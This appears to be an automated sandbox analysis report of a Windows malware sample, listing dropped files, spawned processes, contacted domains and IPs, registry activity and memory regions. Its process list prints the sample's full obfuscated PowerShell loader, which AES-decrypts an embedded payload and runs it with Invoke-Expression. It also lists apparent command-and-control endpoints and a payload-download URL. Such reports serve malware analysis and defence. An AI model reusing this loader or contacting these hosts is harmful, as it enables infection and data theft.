Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
file.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline
|
Unicode text, UTF-8 (with BOM) text, with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESD8A4.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Sep 26 20:35:53 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353e4xkt.405.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw4gxtga.n3x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.out
|
Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
|
modified
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt
= 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9
= '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb
= 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI='
function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p
($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT,
$keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt,
$q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9)
{ $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ
= [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt)
$vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2
= [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9)
$TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs
= [Convert]::FromBase64String($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT)
$5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb
= [System.Security.Cryptography.Aes]::Create() $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key
= $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ
$5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV
= $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2
$5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Padding
= [System.Security.Cryptography.PaddingMode]::PKCS7 $9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ
= $5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.CreateDecryptor($5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.Key,
$5zzUSpYy1mEfoIJX6Yqa4yOShR5gzcRH695aqjegbiP4iKCrUN5ZfnY7khdBUhzo4xJPd96mkKylik96PdWlGr2iLxpJGcWtj0zlBmOlhif4ocpAIGmhVOhc40DfjXgIoFCRkn52Y9DYMxu8IpBzpd65iVQai8CUC7fia7PUbUSmKT07656uVgSL879X7ujp7jVfSMyb.IV)
$8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK
= New-Object System.IO.MemoryStream(, $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9QKjN9WX9Me5F7H5KadGdt2B9qDx6zhgRnqqA4bBo5Xs)
$nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0
= New-Object System.Security.Cryptography.CryptoStream($8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK,
$9gY4UkUZwjENCIyWO4JCxsmga3P0xlPU6vUfSnqoMK1oq5nZlA0nCvdhuhur5t1K4jhGnTD0eWqn0ypEfpfwU1SaRdkbtySSiQTHogb2xzJgFpQvrpMfO4qC1GpJ817fC7FJeiQyNMzUSb41XpjEmdDN0Rfhr2u523d7kGQI9N1C55jqbXmii2tZ3sjXD8GlS4spxxhQ,
[System.Security.Cryptography.CryptoStreamMode]::Read) $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu
= New-Object System.IO.StreamReader($nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0)
$YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt
= $94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.ReadToEnd()
$94nK6S4xriFnftH7mZnnEwJEDpfMCV78qUVdMBNN47xyf3liOxHEhxVdUiHgcRv5L7xU74WkL9S6yLY9DwxFO2rsyjS4u6bMc2nI61LkcXtHepfJT7dfUqQigEVoLrqfxGu6YQDckN2q9jOJDJKVtwslLF22EX8l7NJ8vJlD3BuGX0IwpMkCg3mBNIUTob7XfhTW9gNu.Close()
$nHa8WyWrIL3MwlNGupgLEDNVxLizTU23H2VvvwdMinvA1EAbZvHsJtGkuObJQV8ojAF4YSLxL33RINusKGaXN9TOVcBgW3wVOGQ1z6NHkJgg0pbhUiyJlLbJgrImQ4ch6GCBw2tet3cDtdo7AUVc5maD5HlIY1qQ7yJTmakrpUQS87QCCalwIzMj5z5ohkQ1cV5u44k0.Close()
$8b59LBiv7pG4gLnz9OErXtEAGgjAdusef6KGxUN1JopO2cFHhsPjspsf6425ShRdw1pKBgCPAci9Dq84bcTkeJlpd4a2riJ26LRAmvFAqAiQHTbfwyufY7znfA66F9YS2PDr87hf6Sue15hUtv6sn3EyM4WmY9vQcZnrPjHZROIFdWVJSLcKC55yLEfDLvRxXdBBhpEK.Close()
return $YGsrBmYlw5crd5ED1HUno1Ps470gGmVJzpe9auA0k9VSzfjJdPu2W0GwrAX3WheKI2sor437HuDOFwsooQDrsuo9iih966ECvMJ6muSImVU1XrqvI8fFenSOeTGJmtAapATtmWCtyuE59XLqrm1yqzXIuvs3oJVsWkcV8xIm6mGkimeRHPSA1CkpdLzq38Ep8LJplpSt
} $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW
= 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p
-MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT
$g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb
-keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt
$keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt
-q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9
$q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9
Invoke-Expression $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp"
"c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://drawzhotdog.shop/api
|
172.67.162.108
|
|
|
|
https://gutterydhowi.shop/api
|
104.21.4.136
|
|
|
|
reinforcenh.shop
|
|
||
|
stogeneratmns.shop
|
|
||
|
https://reinforcenh.shop/api
|
172.67.208.139
|
|
|
|
ghostreedmnu.shop
|
|
||
|
https://ballotnwu.site/api
|
104.21.2.13
|
|
|
|
https://ptramidermsnqj.shop/api
|
104.21.83.105
|
|
|
|
https://steamcommunity.com/profiles/76561199724331900
|
104.102.49.254
|
|
|
|
https://stogeneratmns.shop/
|
unknown
|
|
|
|
https://vozmeatillu.shop/api
|
188.114.97.3
|
|
|
|
https://stogeneratmns.shop/api
|
188.114.96.3
|
|
|
|
ptramidermsnqj.shop
|
|
||
|
https://steamcommunity.com/profiles/76561199724331900/inventory/
|
unknown
|
|
|
|
https://ghostreedmnu.shop/api
|
188.114.96.3
|
|
|
|
fragnantbui.shop
|
|
||
|
gutterydhowi.shop
|
|
||
|
https://offensivedzvju.shop/api
|
188.114.96.3
|
|
|
|
https://fragnantbui.shop/api
|
188.114.97.3
|
|
|
|
offensivedzvju.shop
|
|
||
|
drawzhotdog.shop
|
|
||
|
vozmeatillu.shop
|
|
||
|
http://html4/loose.dtd
|
unknown
|
||
|
https://player.vimeo.com
|
unknown
|
||
|
http://147.45.44.131/files/gqgqg.exe
|
147.45.44.131
|
||
|
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
|
unknown
|
||
|
https://community.akamai.steamstatic.com/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://aka.ms/dotnet/app-launch-failed
|
unknown
|
||
|
https://www.gstatic.cn/recaptcha/
|
unknown
|
||
|
https://s.yu
|
unknown
|
||
|
http://.css
|
unknown
|
||
|
https://ballotnwu.site/apiQ
|
unknown
|
||
|
https://offensivedzvju.shop/
|
unknown
|
||
|
https://aka.ms/dotnet-illink/com)
|
unknown
|
||
|
https://github.com/dotnet/runtime
|
unknown
|
||
|
https://recaptcha.net/recaptcha/
|
unknown
|
||
|
https://www.youtube.com
|
unknown
|
||
|
https://aka.ms/dotnet/infopath-to-application:Usage:
|
unknown
|
||
|
https://ghostreedmnu.shop/apiB
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://medal.tv
|
unknown
|
||
|
https://aka.ms/dotnet-warnings/
|
unknown
|
||
|
https://broadcast.st.dl.eccdnx.com
|
unknown
|
||
|
https://aka.ms/dotnet/sdk-not-foundInstall
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://aka.ms/nativeaot-compatibility
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/binaryformatter
|
unknown
|
||
|
https://login.steampowered.com/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://aka.ms/dotnet-core-applaunch?Path:
|
unknown
|
||
|
http://.jpg
|
unknown
|
||
|
https://ballotnwu.site/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/dotnet-core-applaunch?openGetWindowsDirectory
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/dotnet-illink/com
|
unknown
|
||
|
https://recaptcha.net
|
unknown
|
||
|
https://store.steampowered.com/
|
unknown
|
||
|
https://sketchfab.com
|
unknown
|
||
|
https://lv.queniujq.cn
|
unknown
|
||
|
https://www.youtube.com/
|
unknown
|
||
|
http://127.0.0.1:27060
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://147.45.44.131
|
unknown
|
||
|
https://ballotnwu.site/apiA
|
unknown
|
||
|
https://www.google.com/recaptcha/
|
unknown
|
||
|
https://help.steampowered.com/
|
unknown
|
||
|
https://ptramidermsnqj.shop/llh
|
unknown
|
||
|
https://api.steampowered.com/
|
unknown
|
||
|
https://aka.ms/GlobalizationInvariantMode
|
unknown
|
||
|
https://steamcommunity.com/
|
unknown
|
||
|
https://aka.ms/dotnet-illink/nativehost
|
unknown
|
||
|
https://aka.ms/dotnet/download
|
unknown
|
||
|
https://store.steampowered.com/;
|
unknown
|
||
|
https://steamcommunity.com/y
|
unknown
|
There are 73 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fragnantbui.shop
|
188.114.97.3
|
|
|
|
gutterydhowi.shop
|
104.21.4.136
|
|
|
|
ptramidermsnqj.shop
|
104.21.83.105
|
|
|
|
offensivedzvju.shop
|
188.114.96.3
|
|
|
|
stogeneratmns.shop
|
188.114.96.3
|
|
|
|
reinforcenh.shop
|
172.67.208.139
|
|
|
|
drawzhotdog.shop
|
172.67.162.108
|
|
|
|
ghostreedmnu.shop
|
188.114.96.3
|
|
|
|
vozmeatillu.shop
|
188.114.97.3
|
|
|
|
ballotnwu.site
|
104.21.2.13
|
|
|
|
steamcommunity.com
|
104.102.49.254
|
||
|
171.39.242.20.in-addr.arpa
|
unknown
|
There are 2 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.4.136
|
gutterydhowi.shop
|
United States
|
|
|
|
188.114.97.3
|
fragnantbui.shop
|
European Union
|
|
|
|
172.67.162.108
|
drawzhotdog.shop
|
United States
|
|
|
|
188.114.96.3
|
offensivedzvju.shop
|
European Union
|
|
|
|
104.21.2.13
|
ballotnwu.site
|
United States
|
|
|
|
104.21.83.105
|
ptramidermsnqj.shop
|
United States
|
|
|
|
172.67.208.139
|
reinforcenh.shop
|
United States
|
|
|
|
147.45.44.131
|
unknown
|
Russian Federation
|
||
|
104.102.49.254
|
steamcommunity.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
6ACB000
|
stack
|
page read and write
|
||
|
6D4A000
|
stack
|
page read and write
